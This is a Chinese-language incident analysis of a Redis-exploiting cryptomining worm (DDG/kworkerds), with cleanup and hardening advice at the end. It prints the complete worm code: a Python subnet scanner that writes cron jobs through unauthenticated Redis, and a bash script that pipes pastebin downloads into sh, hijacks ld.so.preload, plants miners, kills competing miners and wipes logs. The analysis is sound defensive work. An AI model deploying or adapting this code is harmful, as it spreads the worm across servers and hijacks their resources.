内容简介:受限于缺乏针对 elf 文件的分析能力,对一些逻辑的跟踪仍有一定猜测成分,仅供参考。阿里云主机提供了一些恶意命令执行告警,定位到如下命令尝试跟踪 告警1 和 告警2 的代码,涉及大量中间文件(不过很多都只是base64一下),进行一些简单的梳理后,发现比较重要的三个文件。
受限于缺乏针对 elf 文件的分析能力,对一些逻辑的跟踪仍有一定猜测成分,仅供参考。
# 告警1 python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz')) # 告警2 /bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
尝试跟踪 告警1 和 告警2 的代码,涉及大量中间文件(不过很多都只是base64一下),进行一些简单的梳理后,发现比较重要的三个文件。
1 https://pastebin.com/raw/nYBpuAxT (基于 Python 的扩散对 Redis 未授权访问的利用) 2 https://pastebin.com/raw/Gw7mywhC (在 Linux 中添加各种 crontab, 劫持so, 尽可能保证持久驻留) 3 i.sh, (下发 ELF 挖矿文件)
蠕虫式传播, 最大线程数为 20 线程
获取当前主机 IP, 据此构造出相关 B段 的IP 列表。
并扫描当前主机 (略大于)B段 (涉及 IP 数量是 655360 ) 的其他主机的 6379 端口。
使用 Redis 的备份配置文件命令,将相关内容写入 /var/spool/cron/root 文件中。
借此使用计划任务执行命令, 其中 */1 * * * * 指的是每分钟执行一次相关命令
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) s.connect((self.host, 6379)) s.send('set backup1 "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n') s.send('set backup2 "\\n\\n\\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n') s.send('config set dir /var/spool/cron\r\n') s.send('config set dbfilename root\r\n') s.send('save\r\n') s.close()
原始完整文件 https://pastebin.com/raw/nYBpuAxT
#! /usr/bin/env python #coding: utf-8 import threading import socket from re import findall import httplib IP_LIST = [] class scanner(threading.Thread): tlist = [] maxthreads = 20 evnt = threading.Event() lck = threading.Lock() def __init__(self,host): threading.Thread.__init__(self) self.host = host def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) s.connect((self.host, 6379)) s.send('set backup1 "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n') s.send('set backup2 "\\n\\n\\n*/1 * * * * wget -q -O- https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n') s.send('config set dir /var/spool/cron\r\n') s.send('config set dbfilename root\r\n') s.send('save\r\n') s.close() except Exception as e: pass scanner.lck.acquire() scanner.tlist.remove(self) if len(scanner.tlist) < scanner.maxthreads: scanner.evnt.set() scanner.evnt.clear() scanner.lck.release() def newthread(host): scanner.lck.acquire() sc = scanner(host) scanner.tlist.append(sc) scanner.lck.release() sc.start() newthread = staticmethod(newthread) def get_ip_list(): try: url = 'ident.me' conn = httplib.HTTPConnection(url, port=80, timeout=10) req = conn.request(method='GET', url='/', ) result = conn.getresponse() ip2 = result.read() ips2 = findall(r'\d+.\d+.', ip2)[0][:-2] for u in range(0, 10): ip_list1 = (ips2 + (str(u)) +'.') for i in range(0, 256): ip_list2 = (ip_list1 + (str(i))) for g in range(0, 256): IP_LIST.append(ip_list2 + '.' + (str(g))) except Exception: pass def runPortscan(): get_ip_list() for host in IP_LIST: scanner.lck.acquire() if len(scanner.tlist) >= scanner.maxthreads: scanner.lck.release() scanner.evnt.wait() else: scanner.lck.release() scanner.newthread(host) for t in scanner.tlist: t.join() if __name__ == "__main__": runPortscan()
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM ) if [ ${update}x = "update"x ];then echocron else if [ ! -f "/tmp/.tmph" ]; then rm -rf /tmp/.tmpg python fi kills downloadrun echocron system top sleep 10 port=$(netstat -anp | grep :13531 | wc -l) if [ ${port} -eq 0 ];then downloadrunxm fi echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron fi
kills() 函数
1 杀死本木马老版本的进程
2 删除 grub deamon 和 disk_genius (也可能是伪装的其他木马)
3 杀死其他挖矿程序的进程
4 删除其他挖矿程序的文件
5 杀死启用特定疑似挖矿端口的进程
downloadrun()函数 (无ELF分析能力,半猜测)
echocron() 函数
写入各种 crontab 目录,便于复活。
system() 函数
https://pastebin.com/raw/Fj2YdETv 地址内容
# https://pastebin.com/raw/Fj2YdETv (curl -fsSL https://pastebin.com/raw/JNPewK6r || wget -q -O- https://pastebin.com/raw/JNPewK6r)|base64 -d|/bin/bash
top() 函数
以 so 文件劫持 (/etc/ld.so.preload) 的方式执行挖矿木马,是更隐蔽的执行方式。
如果只是想要覆盖一个库文件的某些函数,但保留其余的内容,可以将覆盖库文件名(.so 后缀文件)保存至 /etc/ld.so.preload 文件中。这些覆盖库文件会比标准库文件优先读取,这通常用于紧急的
downloadrunxm() (无ELF分析能力,半猜测)
配置矿池相关的配置文件 /bin/config.json
原始完整文件 https://pastebin.com/raw/Gw7mywhC
#!/bin/bash SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin function kills() { pkill -f sourplum pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/*index_bak* rm -rf /tmp/*httpd.conf* rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/var/tmp/java" | awk '{print $2}'|xargs kill -9 pkill -f biosetjenkins pkill -f AnXqV.yam pkill -f xmrigDaemon pkill -f xmrigMiner pkill -f xmrig pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f bashx pkill -f bashg pkill -f bashe pkill -f bashf pkill -f bashh pkill -f XbashY pkill -f libapache rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq rm -rf /tmp/kworkerds /bin/kworkerds /bin/config.json netstat -anp | grep |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 y=$(netstat -anp | grep kworkerds | wc -l) if [ ${y} -eq 0 ];then netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 fi } function system() { if [ ! -f "/bin/httpdns" ]; then curl -fsSL https://pastebin.com/raw/Fj2YdETv -o /bin/httpdns && chmod 755 /bin/httpdns if [ ! -f "/bin/httpdns" ]; then wget https://pastebin.com/raw/Fj2YdETv -O /bin/httpdns && chmod 755 /bin/httpdns fi if [ ! -f "/etc/crontab" ]; then echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab else sed -i '$d' /etc/crontab && echo -e "0 1 * * * root /bin/httpdns" >> /etc/crontab fi fi } function top() { mkdir -p /usr/local/lib/ if [ ! -f "/usr/local/lib/libntp.so" ]; then curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so if [ ! -f "/usr/local/lib/libntp.so" ]; then wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so fi fi if [ ! -f "/etc/ld.so.preload" ]; then echo /usr/local/lib/libntp.so > /etc/ld.so.preload else sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload fi touch -acmr /bin/sh /etc/ld.so.preload touch -acmr /bin/sh /usr/local/lib/libntp.so } function python() { nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 & touch /tmp/.tmph } function echocron() { echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/root echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /etc/cron.d/system echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/5bjpjvLP || wget -q -O- https://pastebin.com/raw/5bjpjvLP)|sh\n##" > /var/spool/cron/crontabs/root mkdir -p /etc/cron.hourly curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron if [ ! -f "/etc/cron.hourly/oanacron" ]; then wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.hourly/oanacron && chmod 755 /etc/cron.hourly/oanacron fi mkdir -p /etc/cron.daily curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron if [ ! -f "/etc/cron.daily/oanacron" ]; then wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.daily/oanacron && chmod 755 /etc/cron.daily/oanacron fi mkdir -p /etc/cron.monthly curl -fsSL https://pastebin.com/raw/5bjpjvLP -o /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron if [ ! -f "/etc/cron.monthly/oanacron" ]; then wget https://pastebin.com/raw/5bjpjvLP -O /etc/cron.monthly/oanacron && chmod 755 /etc/cron.monthly/oanacron fi touch -acmr /bin/sh /var/spool/cron/root touch -acmr /bin/sh /var/spool/cron/crontabs/root touch -acmr /bin/sh /etc/cron.d/system touch -acmr /bin/sh /etc/cron.d/root touch -acmr /bin/sh /etc/cron.hourly/oanacron touch -acmr /bin/sh /etc/cron.daily/oanacron touch -acmr /bin/sh /etc/cron.monthly/oanacron } function downloadrun() { ps=$(netstat -anp | grep :13531 | wc -l) if [ ${ps} -eq 0 ];then if [ ! -f "/tmp/kworkerds" ]; then curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod 777 /tmp/kworkerds if [ ! -f "/tmp/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod 777 /tmp/kworkerds fi nohup /tmp/kworkerds >/dev/null 2>&1 & else nohup /tmp/kworkerds >/dev/null 2>&1 & fi fi } function downloadrunxm() { pm=$(netstat -anp | grep :13531 | wc -l) if [ ${pm} -eq 0 ];then if [ ! -f "/bin/config.json" ]; then curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod 777 /bin/config.json if [ ! -f "/bin/config.json" ]; then wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod 777 /bin/config.json fi fi if [ ! -f "/bin/kworkerds" ]; then curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod 777 /bin/kworkerds if [ ! -f "/bin/kworkerds" ]; then wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod 777 /bin/kworkerds fi nohup /bin/kworkerds >/dev/null 2>&1 & else nohup /bin/kworkerds >/dev/null 2>&1 & fi fi } update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/TzBeq3AM ) if [ ${update}x = "update"x ];then echocron else if [ ! -f "/tmp/.tmph" ]; then rm -rf /tmp/.tmpg python fi kills downloadrun echocron system top sleep 10 port=$(netstat -anp | grep :13531 | wc -l) if [ ${port} -eq 0 ];then downloadrunxm fi echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron fi # # #
1 首先将自己写入 /var/spool/cron/root 和 /var/spool/cron/crontabs/root, 保证不断重复执行。
*/15 * * * *, 执行的频率是每 15 分钟一次。
2 根据系统架构,会下载对应的 ELF 挖矿木马 ddgs.x86_64 或 ddgs.i686, 重命名为 /tmp/ddgs.3013 并执行。
3 杀死其他竞争对手的进程。
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL | sh" >> /var/spool/cron/root echo "*/15 * * * * wget -q -O- | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/root echo "*/15 * * * * curl -fsSL | sh" >> /var/spool/cron/crontabs/root echo "*/15 * * * * wget -q -O- | sh" >> /var/spool/cron/crontabs/root ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013 if [ ! -f "/tmp/ddgs.3013" ]; then wget -q$(uname -m) -O /tmp/ddgs.3013 curl -fsSL$(uname -m) -o /tmp/ddgs.3013 fi chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
溯源相关信息 config.json
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
config.json 内容如下
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "worker-id": null, "ipv6": false, "restricted": true }, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "stratum+tcp://xmr.f2pool.com:13531", "user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": 1 } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": null, "user-agent": null, "watch": false }
1 利用 /etc/ld.so.preload 进行隐蔽感染
2 滥用合法的图片上传服务 http://thyrsi.com/t6/365/1535595427x-1404817712.jpg
3 使用 Pastebin 构建 可更新 的恶意软件家族
1 测试一些清理方案时,可以在 虚拟机/沙箱 中先进行尝试。
2 Redis 未授权访问漏洞存在时,攻击者还很有可能通过写 ssh登录密钥 来进行远程登陆操作。
3 此外,存在该漏洞的机器,还有很大可能性会被 删库勒索 , 可以参考阿里云的 预警 - 删库跑路加勒索,Redis勒索事件爆发
1 将 Redis 服务关闭,并设置密码。
在 redis.conf 中找到 "requirepass" 字段,在后面填上你需要的密码,Redis 客户端也需要使用此密码来访问 Redis 服务,之后重启 Redis 服务,验证密码是否生效。
注意要使用强度较高的 Redis 密码,因为该木马也有简单的爆破功能,以扩大传播范围。
2 清理定时任务 (先清理定时任务,再删除挖矿病毒本体,防止再生)
# 包括但不限于 /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/root /etc/cron.hourly/oanacron /etc/cron.daily/oanacron /etc/cron.monthly/oanacron /etc/cron.monthly/oanacron
3 删除相关动态链接库
# 包括但不限于 /etc/ld.so.preload /etc/libjdk.so /usr/local/lib/md.so /usr/local/lib/screen.so /usr/local/lib/y.so
4 结束掉挖矿和 DDG 母体相关进程
ps -ef | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg|kworkerds' | awk '{print $2}' | xargs kill -9
5 然后删除相应的恶意程序,主要在临时目录下。另外建议用 find/locate 再找一下如下关键字qW3xT, ddg*, wnTKYg, 2t3ik 等, 尽可能清理干净。
# 包括但不限于 /tmp/qW3xT /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik /tmp/kworkerds
1 威胁快讯:DDG 3013 版本 - 360 Netlab
http://blog.netlab.360.com/a-fast-ddg-3013-analyze/2 DDG 挖矿最新变种分析报告 - 深信服
http://www.freebuf.com/articles/system/180385.html3 记录阿里云服务器被minerd和kworkerds感染作祟
https://blog.csdn.net/lang363/article/details/823548304 记一次redis病毒分析笔记
https://www.cnblogs.com/mondol/p/9592056.html5 阿里云 centos 服务器 长期 cpu100%,无法通过top、ps等命令找出占cpu进程?
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